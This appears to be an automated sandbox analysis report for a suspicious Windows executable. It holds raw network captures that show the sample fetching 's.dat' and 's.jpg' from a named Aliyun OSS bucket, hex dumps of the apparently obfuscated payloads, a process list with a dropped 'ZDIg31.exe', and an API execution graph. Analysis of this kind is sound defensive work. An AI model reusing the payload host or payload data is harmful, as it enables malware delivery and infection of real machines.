                                    2025-01-11 03:37:55 UTC4096INData Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79
                                    Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
                                    2025-01-11 03:37:55 UTC4096INData Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4
                                    Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
                                    2025-01-11 03:37:55 UTC4096INData Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7
                                    Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
                                    2025-01-11 03:37:55 UTC4096INData Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64
                                    Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.124972339.103.20.1054436496C:\Users\user\Desktop\2976587-987347589.08.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-11 03:38:04 UTC111OUTGET /s.dat HTTP/1.1
                                    User-Agent: GetData
                                    Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-11 03:38:05 UTC561INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Sat, 11 Jan 2025 03:38:05 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 28272
                                    Connection: close
                                    x-oss-request-id: 6781E79D6D28FD3136C2BEDC
                                    Accept-Ranges: bytes
                                    ETag: "896C42E1561CA189DF0DC3F97D59BC62"
                                    Last-Modified: Sat, 11 Jan 2025 03:37:51 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 10431817285171946743
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000113
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: iWxC4VYcoYnfDcP5fVm8Yg==
                                    x-oss-server-time: 20
                                    2025-01-11 03:38:05 UTC3535INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                                    Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
                                    2025-01-11 03:38:05 UTC4096INData Raw: 23 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92
                                    Data Ascii: #_##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                                    2025-01-11 03:38:05 UTC4096INData Raw: 8e 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6
                                    Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
                                    2025-01-11 03:38:05 UTC4096INData Raw: 38 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f
                                    Data Ascii: 80JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKS
                                    2025-01-11 03:38:05 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                                    Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                                    2025-01-11 03:38:05 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                    Data Ascii: ,$LDld=5}u]U
                                    2025-01-11 03:38:05 UTC4096INData Raw: 67 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed
                                    Data Ascii: gG<EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                                    2025-01-11 03:38:05 UTC161INData Raw: 27 bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 ef f7 45 22
                                    Data Ascii: 'VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpSE"


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.124972439.103.20.1054436496C:\Users\user\Desktop\2976587-987347589.08.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-11 03:38:06 UTC111OUTGET /s.jpg HTTP/1.1
                                    User-Agent: GetData
                                    Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-11 03:38:07 UTC543INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Sat, 11 Jan 2025 03:38:06 GMT
                                    Content-Type: image/jpeg
                                    Content-Length: 8299
                                    Connection: close
                                    x-oss-request-id: 6781E79EAF1C2D39355B3255
                                    Accept-Ranges: bytes
                                    ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                    Last-Modified: Fri, 10 Jan 2025 12:30:53 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 692387538176721524
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000104
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                    x-oss-server-time: 2
                                    2025-01-11 03:38:07 UTC3553INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                    Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                    2025-01-11 03:38:07 UTC4096INData Raw: 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43 a5
                                    Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                                    2025-01-11 03:38:07 UTC650INData Raw: f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84 90
                                    Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:22:36:21
                                    Start date:10/01/2025
                                    Path:C:\Users\user\Desktop\2976587-987347589.08.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\2976587-987347589.08.exe"
                                    Imagebase:0x140000000
                                    File size:30'887'936 bytes
                                    MD5 hash:3F0D4AC83E0BEC29AEBC666FF027A5D6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:6
                                    Start time:22:38:06
                                    Start date:10/01/2025
                                    Path:C:\Users\user\Documents\ZDIg31.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\Documents\ZDIg31.exe
                                    Imagebase:0x140000000
                                    File size:133'136 bytes
                                    MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 0%, ReversingLabs
                                    Reputation:moderate
                                    Has exited:true

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:2.1%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:32.3%
                                      Total number of Nodes:458
                                      Total number of Limit Nodes:10
                                      execution_graph 13953 140005df3 13954 140005e71 13953->13954 13955 140005e84 CreateFileA 13954->13955 13956 140005f50 _CreateFrameInfo 13955->13956 13957 140005fc3 malloc ReadFile 13956->13957 15319 140007412 15320 140007333 15319->15320 15321 140007403 15320->15321 15322 1400073e0 LdrLoadDll 15320->15322 15322->15320 16016 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 16019 1400054e0 16016->16019 16018 1400136ef 16020 14000552c 16019->16020 16024 140005506 sprintf_s 16019->16024 16021 1400074d0 LdrLoadDll 16020->16021 16022 140005536 16021->16022 16023 140008370 3 API calls 16022->16023 16026 140005545 _CreateFrameInfo 16023->16026 16024->16018 16025 1400055b8 16027 140008de0 _lock 2 API calls 16025->16027 16026->16025 16029 1400074f0 LdrLoadDll 16026->16029 16028 1400055c0 sprintf_s 16027->16028 16028->16024 16030 140005561 CreateThread 16029->16030 16030->16028 16031 1400055b0 GetLastError 16030->16031 16031->16025 13962 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 13963 140005ab1 13962->13963 13964 140005add GetVersionExA 13962->13964 13965 140005abf 13963->13965 14012 140009540 13963->14012 13966 140005b0e GetProcessHeap HeapFree 13964->13966 13967 140005af0 GetProcessHeap HeapFree 13964->13967 14020 140009300 13965->14020 13972 140005b3c 13966->13972 13970 140005d0b 13967->13970 13971 140005ac9 14031 140008510 GetModuleHandleA 13971->14031 14035 14000a310 HeapCreate 13972->14035 13975 140005ad3 13975->13970 13976 140005bec 13977 140005c12 13976->13977 13978 140005bf0 13976->13978 13980 140005c17 13977->13980 13979 140005bfe 13978->13979 13981 140009540 _lock 12 API calls 13978->13981 13982 140009300 _lock 10 API calls 13979->13982 13984 140005c3d 13980->13984 13986 140005c29 13980->13986 13987 140009540 _lock 12 API calls 13980->13987 13981->13979 13983 140005c08 13982->13983 13985 140008510 _lock 3 API calls 13983->13985 14038 140009f50 GetStartupInfoA 13984->14038 13985->13977 13988 140009300 _lock 10 API calls 13986->13988 13987->13986 13989 140005c33 13988->13989 13992 140008510 _lock 3 API calls 13989->13992 13992->13984 13993 140005c56 14058 140009e30 13993->14058 13996 140005c5b 14076 140009c30 13996->14076 14000 140005c73 14001 140005c81 14000->14001 14002 1400084e0 _lock 12 API calls 14000->14002 14106 140009690 14001->14106 14002->14001 14004 140005c86 14005 140005c94 14004->14005 14006 1400084e0 _lock 12 API calls 14004->14006 14118 140008650 14005->14118 14006->14005 14008 140005c9e 14009 1400084e0 _lock 12 API calls 14008->14009 14010 140005ca9 14008->14010 14009->14010 14122 140001520 14010->14122 14013 14000954e _lock 14012->14013 14014 14000959c 14013->14014 14016 14000961c 14013->14016 14017 1400095c9 GetStdHandle 14013->14017 14015 140009300 _lock 10 API calls 14014->14015 14015->14016 14016->13965 14017->14014 14018 1400095dc 14017->14018 14018->14014 14019 1400095e2 WriteFile 14018->14019 14019->14014 14024 140009320 _lock 14020->14024 14021 140009330 14021->13971 14022 1400094dc GetStdHandle 14022->14021 14023 1400094ef 14022->14023 14023->14021 14025 1400094f5 WriteFile 14023->14025 14024->14021 14024->14022 14026 140009375 _lock 14024->14026 14025->14021 14026->14021 14027 1400093b9 GetModuleFileNameA 14026->14027 14028 1400093d9 _lock 14027->14028 14140 14000f000 14028->14140 14032 140008543 ExitProcess 14031->14032 14033 14000852a GetProcAddress 14031->14033 14033->14032 14034 14000853f 14033->14034 14034->14032 14036 14000a334 14035->14036 14037 14000a339 HeapSetInformation 14035->14037 14036->13976 14037->13976 14166 140008370 14038->14166 14040 14000a1c4 GetStdHandle 14046 14000a17c 14040->14046 14041 140008370 3 API calls 14047 140009f8a 14041->14047 14042 14000a239 SetHandleCount 14050 140005c48 14042->14050 14043 14000a1d8 GetFileType 14043->14046 14044 14000a0e3 14045 14000a11c GetFileType 14044->14045 14044->14046 14044->14050 14171 14000edc0 14044->14171 14045->14044 14046->14040 14046->14042 14046->14043 14049 14000edc0 _lock 3 API calls 14046->14049 14046->14050 14047->14041 14047->14044 14047->14046 14047->14047 14047->14050 14049->14046 14050->13993 14051 1400084e0 14050->14051 14052 140009540 _lock 12 API calls 14051->14052 14053 1400084ed 14052->14053 14054 140009300 _lock 10 API calls 14053->14054 14055 1400084f4 14054->14055 14056 1400073e0 _lock LdrLoadDll 14055->14056 14057 140008500 14056->14057 14059 140009e7c 14058->14059 14060 140009e3e GetCommandLineW 14058->14060 14063 140009e81 GetCommandLineW 14059->14063 14064 140009e69 14059->14064 14061 140009e49 GetCommandLineW 14060->14061 14062 140009e5e GetLastError 14060->14062 14061->14062 14062->14064 14065 140009e75 14062->14065 14063->14064 14064->14065 14066 140009e91 GetCommandLineA 